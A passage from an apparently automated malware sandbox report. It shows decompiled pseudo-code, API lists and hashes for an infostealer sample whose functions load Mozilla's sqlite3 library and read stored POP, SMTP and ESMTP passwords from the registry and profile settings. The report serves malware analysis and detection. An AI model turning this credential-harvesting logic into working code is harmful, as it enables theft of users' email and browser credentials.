                                                                                              				_t4 = RegOpenKeyExA(_a4, _a8, 0, 0x20019, _a12); // executed
                                                                                              				return _t4;
                                                                                              			}




                                                                                              0x0040eb52
                                                                                              0x0040eb58

                                                                                              APIs
                                                                                              • RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Open
                                                                                              • String ID:
                                                                                              • API String ID: 71445658-0
                                                                                              • Opcode ID: b46f2f1118fe08c26f7697601471cbdaa0b1b95653fa9af9082cd2e3fcf7fc30
                                                                                              • Instruction ID: fbac0a3e3d82dbf35b582ab386aad6bc4faf60f338d600bbfef3ad5534bed626
                                                                                              • Opcode Fuzzy Hash: b46f2f1118fe08c26f7697601471cbdaa0b1b95653fa9af9082cd2e3fcf7fc30
                                                                                              • Instruction Fuzzy Hash: 60C09B35544301BFDE118F40EE05F09BF62BB88B01F104814B394740B1C3718424FB17
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Non-executed Functions

                                                                                              C-Code - Quality: 100%
                                                                                              			E0040F64B(intOrPtr* __esi, char* _a4) {
                                                                                              				void _v283;
                                                                                              				char _v284;
                                                                                              				void _v547;
                                                                                              				char _v548;
                                                                                              				struct HINSTANCE__* _t45;
                                                                                              				struct HINSTANCE__* _t46;
                                                                                              				struct HINSTANCE__* _t57;
                                                                                              				struct HINSTANCE__* _t68;
                                                                                              				CHAR* _t79;
                                                                                              				intOrPtr* _t81;
                                                                                              
                                                                                              				_t81 = __esi;
                                                                                              				if( *((intOrPtr*)(__esi + 0x24)) != 0) {
                                                                                              					L14:
                                                                                              					return 1;
                                                                                              				}
                                                                                              				_v284 = 0;
                                                                                              				memset( &_v283, 0, 0x117);
                                                                                              				if(_a4 == 0) {
                                                                                              					E0040F435( &_v284);
                                                                                              				} else {
                                                                                              					strcpy( &_v284, _a4);
                                                                                              				}
                                                                                              				if(_v284 == 0) {
                                                                                              					_t79 = "sqlite3.dll";
                                                                                              					_t45 = GetModuleHandleA(_t79);
                                                                                              					 *(_t81 + 0x24) = _t45;
                                                                                              					if(_t45 != 0) {
                                                                                              						goto L12;
                                                                                              					}
                                                                                              					_t57 = LoadLibraryA(_t79);
                                                                                              					goto L11;
                                                                                              				} else {
                                                                                              					_v548 = 0;
                                                                                              					memset( &_v547, 0, 0x104);
                                                                                              					strcpy( &_v548,  &_v284);
                                                                                              					strcat( &_v284, "\\sqlite3.dll");
                                                                                              					if(E0040614B( &_v284) == 0) {
                                                                                              						strcpy( &_v284,  &_v548);
                                                                                              						strcat( &_v284, "\\mozsqlite3.dll");
                                                                                              					}
                                                                                              					_t68 = GetModuleHandleA( &_v284);
                                                                                              					 *(_t81 + 0x24) = _t68;
                                                                                              					if(_t68 != 0) {
                                                                                              						L12:
                                                                                              						_t46 =  *(_t81 + 0x24);
                                                                                              						if(_t46 == 0) {
                                                                                              							return 0;
                                                                                              						}
                                                                                              						 *_t81 = GetProcAddress(_t46, "sqlite3_open");
                                                                                              						 *((intOrPtr*)(_t81 + 4)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_prepare");
                                                                                              						 *((intOrPtr*)(_t81 + 8)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_step");
                                                                                              						 *((intOrPtr*)(_t81 + 0xc)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_column_text");
                                                                                              						 *((intOrPtr*)(_t81 + 0x10)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_column_int");
                                                                                              						 *((intOrPtr*)(_t81 + 0x14)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_column_int64");
                                                                                              						 *((intOrPtr*)(_t81 + 0x18)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_finalize");
                                                                                              						 *((intOrPtr*)(_t81 + 0x1c)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_close");
                                                                                              						 *((intOrPtr*)(_t81 + 0x20)) = GetProcAddress( *(_t81 + 0x24), "sqlite3_exec");
                                                                                              						goto L14;
                                                                                              					} else {
                                                                                              						_t57 = LoadLibraryExA( &_v284, 0, 8);
                                                                                              						L11:
                                                                                              						 *(_t81 + 0x24) = _t57;
                                                                                              						goto L12;
                                                                                              					}
                                                                                              				}
                                                                                              			}













                                                                                              0x0040f7bf
                                                                                              0x0040f7cc
                                                                                              0x0040f7d9
                                                                                              0x0040f7de
                                                                                              0x00000000
                                                                                              0x0040f72f
                                                                                              0x0040f739
                                                                                              0x0040f75b
                                                                                              0x0040f75b
                                                                                              0x00000000
                                                                                              0x0040f75b
                                                                                              0x0040f72d

                                                                                              APIs
                                                                                              • memset.MSVCRT ref: 0040F674
                                                                                              • strcpy.MSVCRT(?,?,?,?,00000000), ref: 0040F68B
                                                                                              • memset.MSVCRT ref: 0040F6B8
                                                                                              • strcpy.MSVCRT(?,?,?,00000000,00000104,?,?,00000000), ref: 0040F6CB
                                                                                              • strcat.MSVCRT(?,\sqlite3.dll,?,?,?,00000000,00000104,?,?,00000000), ref: 0040F6DC
                                                                                              • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F702
                                                                                              • strcat.MSVCRT(?,\mozsqlite3.dll,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F713
                                                                                              • GetModuleHandleA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F722
                                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000008,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040F739
                                                                                              • GetModuleHandleA.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040F747
                                                                                              • LoadLibraryA.KERNEL32(sqlite3.dll,?,?,00000000), ref: 0040F755
                                                                                              • GetProcAddress.KERNEL32(?,sqlite3_open), ref: 0040F775
                                                                                              • GetProcAddress.KERNEL32(?,sqlite3_prepare), ref: 0040F781
                                                                                              • GetProcAddress.KERNEL32(?,sqlite3_step), ref: 0040F78E
                                                                                              • GetProcAddress.KERNEL32(?,sqlite3_column_text), ref: 0040F79B
                                                                                              • GetProcAddress.KERNEL32(?,sqlite3_column_int), ref: 0040F7A8
                                                                                              • GetProcAddress.KERNEL32(?,sqlite3_column_int64), ref: 0040F7B5
                                                                                              • GetProcAddress.KERNEL32(?,sqlite3_finalize), ref: 0040F7C2
                                                                                              • GetProcAddress.KERNEL32(?,sqlite3_close), ref: 0040F7CF
                                                                                              • GetProcAddress.KERNEL32(?,sqlite3_exec), ref: 0040F7DC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: AddressProc$strcpy$HandleLibraryLoadModulememsetstrcat
                                                                                              • String ID: \mozsqlite3.dll$\sqlite3.dll$sqlite3.dll$sqlite3_close$sqlite3_column_int$sqlite3_column_int64$sqlite3_column_text$sqlite3_exec$sqlite3_finalize$sqlite3_open$sqlite3_prepare$sqlite3_step
                                                                                              • API String ID: 3567885941-2042458128
                                                                                              • Opcode ID: bd0ce2e375925359ec1219c205f3dbe1c8e580fb1eb91f69f3ac3bcbec633a35
                                                                                              • Instruction ID: 8fd3bcd04759d815ffa5d5b817f34976dc276f641444eb2ebd63b60ef60fef8a
                                                                                              • Opcode Fuzzy Hash: bd0ce2e375925359ec1219c205f3dbe1c8e580fb1eb91f69f3ac3bcbec633a35
                                                                                              • Instruction Fuzzy Hash: C9416571940308AACB30AF718D85DCBBBF9AB58705F10497BE246E3550E778E685CF58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 87%
                                                                                              			E00402D9A(void* __ecx, void* __edi, void* __esi, void* __fp0, signed int _a4, void* _a8) {
                                                                                              				signed int _v8;
                                                                                              				char _v20;
                                                                                              				char _v24;
                                                                                              				char _v152;
                                                                                              				char _v280;
                                                                                              				char _v408;
                                                                                              				intOrPtr _v412;
                                                                                              				char _v668;
                                                                                              				char _v796;
                                                                                              				intOrPtr _v800;
                                                                                              				char _v928;
                                                                                              				char _v940;
                                                                                              				char _v952;
                                                                                              				char _v956;
                                                                                              				char _v1084;
                                                                                              				char _v1212;
                                                                                              				char _v1340;
                                                                                              				intOrPtr _v1344;
                                                                                              				char _v1600;
                                                                                              				char _v1728;
                                                                                              				intOrPtr _v1732;
                                                                                              				char _v1860;
                                                                                              				char _v1872;
                                                                                              				void* _t59;
                                                                                              				signed int _t60;
                                                                                              				intOrPtr _t63;
                                                                                              				void* _t113;
                                                                                              				void* _t118;
                                                                                              				void* _t122;
                                                                                              				char* _t123;
                                                                                              				void* _t141;
                                                                                              
                                                                                              				_t141 = __fp0;
                                                                                              				_t118 = __edi;
                                                                                              				_t113 = __ecx;
                                                                                              				_t59 = E0040EB3F(_a4, _a8,  &_a8);
                                                                                              				if(_t59 == 0) {
                                                                                              					_t60 = 0x7d;
                                                                                              					_a4 = _t60;
                                                                                              					_v8 = _t60;
                                                                                              					E004021D8( &_v1872);
                                                                                              					E004021D8( &_v940);
                                                                                              					_t63 = 2;
                                                                                              					_v1732 = _t63;
                                                                                              					_v800 = _t63;
                                                                                              					_push( &_v928);
                                                                                              					_push("DisplayName");
                                                                                              					_push(_a8);
                                                                                              					_v1344 = 4;
                                                                                              					_t122 = 0x7f;
                                                                                              					_v412 = 1;
                                                                                              					E0040EB80(_t122, _t113);
                                                                                              					E0040EB80(_t122, _t113, _a8, "EmailAddress",  &_v796);
                                                                                              					E0040EB80(_t122, _t113, _a8, "PopAccount",  &_v408);
                                                                                              					E0040EB80(_t122, _t113, _a8, "PopServer",  &_v668);
                                                                                              					E0040EB59(_t113, _a8, "PopPort",  &_v24);
                                                                                              					E0040EB59(_t113, _a8, "PopLogSecure",  &_v20);
                                                                                              					if(E0040EBA3(_t113, _a8, "PopPassword",  &_v280,  &_a4) != 0) {
                                                                                              						_a4 = _a4 & 0x00000000;
                                                                                              					}
                                                                                              					strcpy( &_v1860,  &_v928);
                                                                                              					strcpy( &_v1728,  &_v796);
                                                                                              					E0040EB80(_t122, _t113, _a8, "SMTPAccount",  &_v1340);
                                                                                              					E0040EB80(_t122, _t113, _a8, "SMTPServer",  &_v1600);
                                                                                              					E0040EB59(_t113, _a8, "SMTPPort",  &_v956);
                                                                                              					E0040EB59(_t113, _a8, "SMTPLogSecure",  &_v952);
                                                                                              					if(E0040EBA3(_t113, _a8, "SMTPPassword",  &_v1212,  &_v8) != 0) {
                                                                                              						_v8 = _v8 & 0x00000000;
                                                                                              					}
                                                                                              					_t123 = _t118 + 0xa9c;
                                                                                              					strcpy( &_v152, _t123);
                                                                                              					strcpy( &_v1084, _t123);
                                                                                              					_t116 = _a4;
                                                                                              					if(_a4 > 0) {
                                                                                              						E00401D18( &_v280, _t116);
                                                                                              					}
                                                                                              					if(_v408 != 0) {
                                                                                              						E00402407( &_v940, _t141, _t118);
                                                                                              					}
                                                                                              					_t117 = _v8;
                                                                                              					if(_v8 > 0) {
                                                                                              						E00401D18( &_v1212, _t117);
                                                                                              					}
                                                                                              					if(_v1340 != 0) {
                                                                                              						E00402407( &_v1872, _t141, _t118);
                                                                                              					}
                                                                                              					return RegCloseKey(_a8);
                                                                                              				}
                                                                                              				return _t59;
                                                                                              			}


                                                                                              APIs
                                                                                                • Part of subcall function 0040EB3F: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040EEE8,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040EB52
                                                                                                • Part of subcall function 0040EB80: RegQueryValueExA.ADVAPI32(?,00000000,00000000,?,0040EF11,?,?,?,?,0040EF11,00000000,?,?), ref: 0040EB9B
                                                                                                • Part of subcall function 0040EB59: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00402945,?,?,?,?,00402945,?,?), ref: 0040EB78
                                                                                                • Part of subcall function 0040EBA3: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,004024A0,?), ref: 0040EBB9
                                                                                              • strcpy.MSVCRT(?,?), ref: 00402EB1
                                                                                              • strcpy.MSVCRT(?,?,?,?), ref: 00402EC4
                                                                                              • strcpy.MSVCRT(?,?), ref: 00402F51
                                                                                              • strcpy.MSVCRT(?,?,?,?), ref: 00402F5E
                                                                                              • RegCloseKey.ADVAPI32(?), ref: 00402FB8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: strcpy$QueryValue$CloseOpen
                                                                                              • String ID: DisplayName$EmailAddress$PopAccount$PopLogSecure$PopPassword$PopPort$PopServer$SMTPAccount$SMTPLogSecure$SMTPPassword$SMTPPort$SMTPServer
                                                                                              • API String ID: 4127491968-1534328989
                                                                                              • Opcode ID: 230cedb7557afc89ff87b7a07133d539cd397bf30d1a568f7adca2b7a7a96a6c
                                                                                              • Instruction ID: 43883d4594eb94b0077ee0611f04b7cce421852a2964d1822423da303833eb9e
                                                                                              • Opcode Fuzzy Hash: 230cedb7557afc89ff87b7a07133d539cd397bf30d1a568f7adca2b7a7a96a6c
                                                                                              • Instruction Fuzzy Hash: 5D514AB1A0021CBADB11EB56CD41FDE777CAF04354F1084A7BA08B2191D7B8ABA5CF58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E004033D7(void* __edi, void* __fp0, intOrPtr _a4) {
                                                                                              				char _v276;
                                                                                              				char _v404;
                                                                                              				intOrPtr _v408;
                                                                                              				char _v664;
                                                                                              				intOrPtr _v796;
                                                                                              				char _v936;
                                                                                              				char _v1208;
                                                                                              				char _v1336;
                                                                                              				intOrPtr _v1340;
                                                                                              				char _v1596;
                                                                                              				intOrPtr _v1728;
                                                                                              				char _v1868;
                                                                                              				void* __esi;
                                                                                              				intOrPtr _t23;
                                                                                              				void* _t35;
                                                                                              
                                                                                              				_t48 = __fp0;
                                                                                              				E004021D8( &_v936);
                                                                                              				E004021D8( &_v1868);
                                                                                              				_t23 = 4;
                                                                                              				_v796 = _t23;
                                                                                              				_v1728 = _t23;
                                                                                              				_v408 = _t23;
                                                                                              				_v1340 = 1;
                                                                                              				E00403397(__edi, "SMTPServer",  &_v664);
                                                                                              				E00403397(__edi, "ESMTPUsername",  &_v404);
                                                                                              				E00403397(__edi, "ESMTPPassword",  &_v276);
                                                                                              				E00403397(__edi, "POP3Server",  &_v1596);
                                                                                              				E00403397(__edi, "POP3Username",  &_v1336);
                                                                                              				_t35 = E00403397(__edi, "POP3Password",  &_v1208);
                                                                                              				if(_v276 != 0) {
                                                                                              					E004033B8( &_v276);
                                                                                              					_t35 = E00402407( &_v936, __fp0, _a4);
                                                                                              				}
                                                                                              				if(_v1208 != 0) {
                                                                                              					E004033B8( &_v1208);
                                                                                              					return E00402407( &_v1868, _t48, _a4);
                                                                                              				}
                                                                                              				return _t35;
                                                                                              			}



















                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 0000000F.00000002.333100193.0000000000418000.00000040.00000001.sdmp
                                                                                              Similarity
                                                                                              • API ID: PrivateProfileString_mbscmpstrlen
                                                                                              • String ID: ESMTPPassword$ESMTPUsername$POP3Password$POP3Server$POP3Username$SMTPServer
                                                                                              • API String ID: 3963849919-1658304561
                                                                                              • Opcode ID: a1e27bd18c60c19633001e89eabf5a28a20170ba59de575fff79d49308c97fe4
                                                                                              • Instruction ID: 83b6c818750e3233ea62b9214f8e154f1c79117fabd3a6fe6fd9d90b5f1d4615
                                                                                              • Opcode Fuzzy Hash: a1e27bd18c60c19633001e89eabf5a28a20170ba59de575fff79d49308c97fe4
                                                                                              • Instruction Fuzzy Hash: DA21E271844218A9DB61EB11CD86BED7B7C9F44709F0000EBAA08B60D2DBBC5BD58F59
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 99%
                                                                                              			E0040F808(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                              				signed int _v8;
                                                                                              				void* _v11;
                                                                                              				char _v12;
                                                                                              				char _v13;
                                                                                              				char _v19;
                                                                                              				char _v20;
                                                                                              				char _v21;
                                                                                              				char _v22;
                                                                                              				char _v23;
                                                                                              				char _v24;
                                                                                              				signed int _v28;
                                                                                              				short _v30;
                                                                                              				short _v32;
                                                                                              				char* _v36;
                                                                                              				char* _v40;
                                                                                              				intOrPtr _v44;
                                                                                              				intOrPtr _v48;
                                                                                              				intOrPtr _v52;
                                                                                              				char* _v56;
                                                                                              				char* _v60;
                                                                                              				char* _v64;
                                                                                              				char _v76;
                                                                                              				void _v88;
                                                                                              				intOrPtr _v92;
                                                                                              				char* _v96;
                                                                                              				char* _v100;
                                                                                              				intOrPtr _v104;
                                                                                              				char* _v108;
                                                                                              				char* _v112;
                                                                                              				char* _v116;
                                                                                              				char* _v120;
                                                                                              				char* _v124;
                                                                                              				intOrPtr _v128;
                                                                                              				char* _v132;
                                                                                              				char* _v136;
                                                                                              				char* _v140;
                                                                                              				char* _v144;
                                                                                              				char* _v148;
                                                                                              				char* _v152;
                                                                                              				intOrPtr _v156;
                                                                                              				char* _v160;
                                                                                              				char* _v164;
                                                                                              				char* _v168;
                                                                                              				intOrPtr _v172;
                                                                                              				char* _v176;
                                                                                              				char* _v180;
                                                                                              				char* _v184;
                                                                                              				char* _v188;
                                                                                              				char* _v192;
                                                                                              				char* _v196;
                                                                                              				intOrPtr _v200;
                                                                                              				char* _v204;
                                                                                              				char* _v208;
                                                                                              				char* _v212;
                                                                                              				char* _v216;
                                                                                              				char* _v220;
                                                                                              				char* _v224;
                                                                                              				char* _v228;
                                                                                              				intOrPtr _v232;
                                                                                              				char* _v236;
                                                                                              				char* _v240;
                                                                                              				char* _v244;
                                                                                              				char* _v248;
                                                                                              				char* _v252;
                                                                                              				intOrPtr _v256;
                                                                                              				char* _v260;
                                                                                              				char* _v264;
                                                                                              				char* _v268;
                                                                                              				char* _v272;
                                                                                              				char* _v276;
                                                                                              				char* _v280;
                                                                                              				intOrPtr _v284;
                                                                                              				char* _v288;
                                                                                              				char* _v292;
                                                                                              				char* _v296;
                                                                                              				intOrPtr _v300;
                                                                                              				char* _v304;
                                                                                              				char* _v308;
                                                                                              				char* _v312;
                                                                                              				char* _v316;
                                                                                              				char* _v320;
                                                                                              				char* _v324;
                                                                                              				intOrPtr _v328;
                                                                                              				char* _v332;
                                                                                              				char* _v336;
                                                                                              				char* _v340;
                                                                                              				char* _v344;
                                                                                              				char* _v348;
                                                                                              				char* _v352;
                                                                                              				char* _v356;
                                                                                              				char* _v360;
                                                                                              				char* _v364;
                                                                                              				intOrPtr _v368;
                                                                                              				intOrPtr _v372;
                                                                                              				char* _v376;
                                                                                              				char* _v380;
                                                                                              				intOrPtr _v384;
                                                                                              				char* _v388;
                                                                                              				char* _v392;
                                                                                              				intOrPtr _v396;
                                                                                              				intOrPtr _v400;
                                                                                              				char* _v404;
                                                                                              				char* _v408;
                                                                                              				intOrPtr _v412;
                                                                                              				char* _v416;
                                                                                              				char* _v420;
                                                                                              				char* _v424;
                                                                                              				char* _v428;
                                                                                              				intOrPtr _v432;
                                                                                              				intOrPtr _v436;
                                                                                              				char* _v440;
                                                                                              				intOrPtr _v444;
                                                                                              				char* _v448;
                                                                                              				char* _v452;
                                                                                              				char* _v456;
                                                                                              				char* _v460;
                                                                                              				intOrPtr _v464;
                                                                                              				char* _v468;
                                                                                              				intOrPtr* _t200;
                                                                                              				char* _t202;
                                                                                              				char _t203;
                                                                                              				int _t205;
                                                                                              				int _t206;
                                                                                              				intOrPtr _t209;
                                                                                              				char* _t211;
                                                                                              				int _t213;
                                                                                              				void _t216;
                                                                                              				char _t220;
                                                                                              				void _t221;
                                                                                              				int _t226;
                                                                                              				signed int _t231;
                                                                                              				intOrPtr* _t232;
                                                                                              				void _t237;
                                                                                              				void* _t238;
                                                                                              				void* _t240;
                                                                                              				void* _t245;
                                                                                              				signed int _t246;
                                                                                              				signed int _t249;
                                                                                              				int _t250;
                                                                                              				void* _t251;
                                                                                              				int _t252;
                                                                                              				void* _t254;
                                                                                              				void* _t255;
                                                                                              				void* _t256;
                                                                                              
                                                                                              				_v64 = "amp;";
                                                                                              				_v60 = "lt;";
                                                                                              				_v56 = "gt;";
                                                                                              				_v52 = "quot;";
                                                                                              				_v48 = "nbsp;";
                                                                                              				_v44 = "apos;";
                                                                                              				_v24 = 0x26;
                                                                                              				_v23 = 0x3c;
                                                                                              				_v22 = 0x3e;
                                                                                              				_v21 = 0x22;
                                                                                              				_v20 = 0x20;
                                                                                              				_v19 = 0x27;
                                                                                              				_v468 = "iexcl;";
                                                                                              				_v464 = "cent;";
                                                                                              				_v460 = "pound;";
                                                                                              				_v456 = "curren;";
                                                                                              				_v452 = "yen;";
                                                                                              				_v448 = "brvbar;";
                                                                                              				_v444 = "sect;";
                                                                                              				_v440 = "uml;";
                                                                                              				_v436 = "copy;";
                                                                                              				_v432 = "ordf;";
                                                                                              				_v428 = "laquo;";
                                                                                              				_v424 = "not;";
                                                                                              				_v420 = "shy;";
                                                                                              				_v416 = "reg;";
                                                                                              				_v412 = "macr;";
                                                                                              				_v408 = "deg;";
                                                                                              				_v404 = "plusmn;";
                                                                                              				_v400 = "sup2;";
                                                                                              				_v396 = "sup3;";
                                                                                              				_v392 = "acute;";
                                                                                              				_v388 = "micro;";
                                                                                              				_v384 = "para;";
                                                                                              				_v380 = "middot;";
                                                                                              				_v376 = "cedil;";
                                                                                              				_v372 = "sup1;";
                                                                                              				_v368 = "ordm;";
                                                                                              				_v364 = "raquo;";
                                                                                              				_v360 = "frac14;";
                                                                                              				_v356 = "frac12;";
                                                                                              				_v352 = "frac34;";
                                                                                              				_v348 = "iquest;";
                                                                                              				_v344 = "Agrave;";
                                                                                              				_v340 = "Aacute;";
                                                                                              				_v336 = "Acirc;";
                                                                                              				_v332 = "Atilde;";
                                                                                              				_v328 = "Auml;";
                                                                                              				_v324 = "Aring;";
                                                                                              				_v320 = "AElig;";
                                                                                              				_v316 = "Ccedil;";
                                                                                              				_v312 = "Egrave;";
                                                                                              				_v308 = "Eacute;";
                                                                                              				_v304 = "Ecirc;";
                                                                                              				_v300 = "Euml;";
                                                                                              				_v296 = "Igrave;";
                                                                                              				_v292 = "Iacute;";
                                                                                              				_v288 = "Icirc;";
                                                                                              				_v284 = "Iuml;";
                                                                                              				_v280 = "ETH;";
                                                                                              				_v276 = "Ntilde;";
                                                                                              				_v272 = "Ograve;";
                                                                                              				_v268 = "Oacute;";
                                                                                              				_v264 = "Ocirc;";
                                                                                              				_v260 = "Otilde;";
                                                                                              				_v256 = "Ouml;";
                                                                                              				_v252 = "times;";
                                                                                              				_v248 = "Oslash;";
                                                                                              				_v244 = "Ugrave;";
                                                                                              				_v240 = "Uacute;";
                                                                                              				_v236 = "Ucirc;";
                                                                                              				_v232 = "Uuml;";
                                                                                              				_v228 = "Yacute;";
                                                                                              				_v224 = "THORN;";
                                                                                              				_v220 = "szlig;";
                                                                                              				_v216 = "agrave;";
                                                                                              				_v212 = "aacute;";
                                                                                              				_v208 = "acirc;";
                                                                                              				_v204 = "atilde;";
                                                                                              				_t200 = _a8;
                                                                                              				_v28 = _v28 | 0xffffffff;
                                                                                              				_t231 = 0;
                                                                                              				_t254 = 0;
                                                                                              				_v200 = "auml;";
                                                                                              				_v196 = "aring;";
                                                                                              				_v192 = "aelig;";
                                                                                              				_v188 = "ccedil;";
                                                                                              				_v184 = "egrave;";
                                                                                              				_v180 = "eacute;";
                                                                                              				_v176 = "ecirc;";
                                                                                              				_v172 = "euml;";
                                                                                              				_v168 = "igrave;";
                                                                                              				_v164 = "iacute;";
                                                                                              				_v160 = "icirc;";
                                                                                              				_v156 = "iuml;";
                                                                                              				_v152 = "eth;";
                                                                                              				_v148 = "ntilde;";
                                                                                              				_v144 = "ograve;";
                                                                                              				_v140 = "oacute;";
                                                                                              				_v136 = "ocirc;";
                                                                                              				_v132 = "otilde;";
                                                                                              				_v128 = "ouml;";
                                                                                              				_v124 = "divide;";
                                                                                              				_v120 = "oslash;";
                                                                                              				_v116 = "ugrave;";
                                                                                              				_v112 = "uacute;";
                                                                                              				_v108 = "ucirc;";
                                                                                              				_v104 = "uuml;";
                                                                                              				_v100 = "yacute;";
                                                                                              				_v96 = "thorn;";
                                                                                              				_v92 = "yuml;";
                                                                                              				if( *_t200 == 0) {
                                                                                              					L45:
                                                                                              					_t202 = _a4 + _t231;
                                                                                              					 *_t202 = 0;
                                                                                              					if(_a20 == 0 || _t231 <= 0 ||  *((char*)(_t202 - 1)) != 0x20) {
                                                                                              						return _t202;
                                                                                              					} else {
                                                                                              						 *((char*)(_t202 - 1)) = 0;
                                                                                              						return _t202;
                                                                                              					}
                                                                                              				}
                                                                                              				while(_a12 == 0xffffffff || _a12 > _t254) {
                                                                                              					_t232 = _t254 + _t200;
                                                                                              					_t203 =  *_t232;
                                                                                              					_v13 = _t203;
                                                                                              					if(_t203 != 0x26) {
                                                                                              						L33:
                                                                                              						if(_a16 == 0 || _t203 > 0x20) {
                                                                                              							 *((char*)(_t231 + _a4)) = _t203;
                                                                                              							_t231 = _t231 + 1;
                                                                                              						} else {
                                                                                              							if(_t231 != _v28) {
                                                                                              								 *((char*)(_t231 + _a4)) = 0x20;
                                                                                              								_t231 = _t231 + 1;
                                                                                              								if(_a20 != 0 && _t231 == 1) {
                                                                                              									_t231 = 0;
                                                                                              								}
                                                                                              							}
                                                                                              							_v28 = _t231;
                                                                                              						}
                                                                                              						_t254 = _t254 + 1;
                                                                                              						L43:
                                                                                              						_t200 = _a8;
                                                                                              						if( *((char*)(_t254 + _t200)) != 0) {
                                                                                              							continue;
                                                                                              						}
                                                                                              						break;
                                                                                              					}
                                                                                              					_t249 = 0;
                                                                                              					_v36 = _t232 + 1;
                                                                                              					while(1) {
                                                                                              						_t205 = strlen( *(_t255 + _t249 * 4 - 0x3c));
                                                                                              						_v8 = _t205;
                                                                                              						_t206 = strncmp(_v36,  *(_t255 + _t249 * 4 - 0x3c), _t205);
                                                                                              						_t256 = _t256 + 0x10;
                                                                                              						if(_t206 == 0) {
                                                                                              							break;
                                                                                              						}
                                                                                              						_t249 = _t249 + 1;
                                                                                              						if(_t249 < 6) {
                                                                                              							continue;
                                                                                              						}
                                                                                              						_t209 = _a8;
                                                                                              						if( *((char*)(_t254 + _t209 + 1)) != 0x23) {
                                                                                              							L29:
                                                                                              							_v8 = _v8 & 0x00000000;
                                                                                              							while(1) {
                                                                                              								_t211 =  *(_t255 + _v8 * 4 - 0x1d0);
                                                                                              								_v40 = _t211;
                                                                                              								_t250 = strlen(_t211);
                                                                                              								_t213 = strncmp(_v36, _v40, _t250);
                                                                                              								_t256 = _t256 + 0x10;
                                                                                              								if(_t213 == 0) {
                                                                                              									break;
                                                                                              								}
                                                                                              								_v8 = _v8 + 1;
                                                                                              								if(_v8 < 0x5f) {
                                                                                              									continue;
                                                                                              								}
                                                                                              								_t203 = _v13;
                                                                                              								goto L33;
                                                                                              							}
                                                                                              							 *((char*)(_t231 + _a4)) = _v8 - 0x5f;
                                                                                              							_t231 = _t231 + 1;
                                                                                              							_t254 = _t254 + _t250 + 1;
                                                                                              							goto L43;
                                                                                              						}
                                                                                              						_t128 = _t209 + 2; // 0x2
                                                                                              						_t251 = _t254 + _t128;
                                                                                              						_t237 =  *_t251;
                                                                                              						if(_t237 == 0x78 || _t237 == 0x58) {
                                                                                              							_t159 = _t209 + 3; // 0x3
                                                                                              							_t245 = _t254 + _t159;
                                                                                              							_t238 = _t245;
                                                                                              							_t252 = 0;
                                                                                              							while(1) {
                                                                                              								_t216 =  *_t238;
                                                                                              								if(_t216 == 0) {
                                                                                              									break;
                                                                                              								}
                                                                                              								if(_t216 == 0x3b) {
                                                                                              									L27:
                                                                                              									if(_t252 <= 0) {
                                                                                              										goto L29;
                                                                                              									}
                                                                                              									memcpy( &_v88, _t245, _t252);
                                                                                              									 *((char*)(_t255 + _t252 - 0x54)) = 0;
                                                                                              									_t220 = E00406512( &_v88);
                                                                                              									_t256 = _t256 + 0x10;
                                                                                              									 *((char*)(_t231 + _a4)) = _t220;
                                                                                              									_t231 = _t231 + 1;
                                                                                              									_t254 = _t254 + _t252 + 4;
                                                                                              									goto L43;
                                                                                              								}
                                                                                              								_t252 = _t252 + 1;
                                                                                              								if(_t252 >= 4) {
                                                                                              									break;
                                                                                              								}
                                                                                              								_t238 = _t238 + 1;
                                                                                              							}
                                                                                              							_t252 = _t252 | 0xffffffff;
                                                                                              							goto L27;
                                                                                              						} else {
                                                                                              							_t240 = _t251;
                                                                                              							_t246 = 0;
                                                                                              							while(1) {
                                                                                              								_t221 =  *_t240;
                                                                                              								if(_t221 == 0) {
                                                                                              									break;
                                                                                              								}
                                                                                              								if(_t221 == 0x3b) {
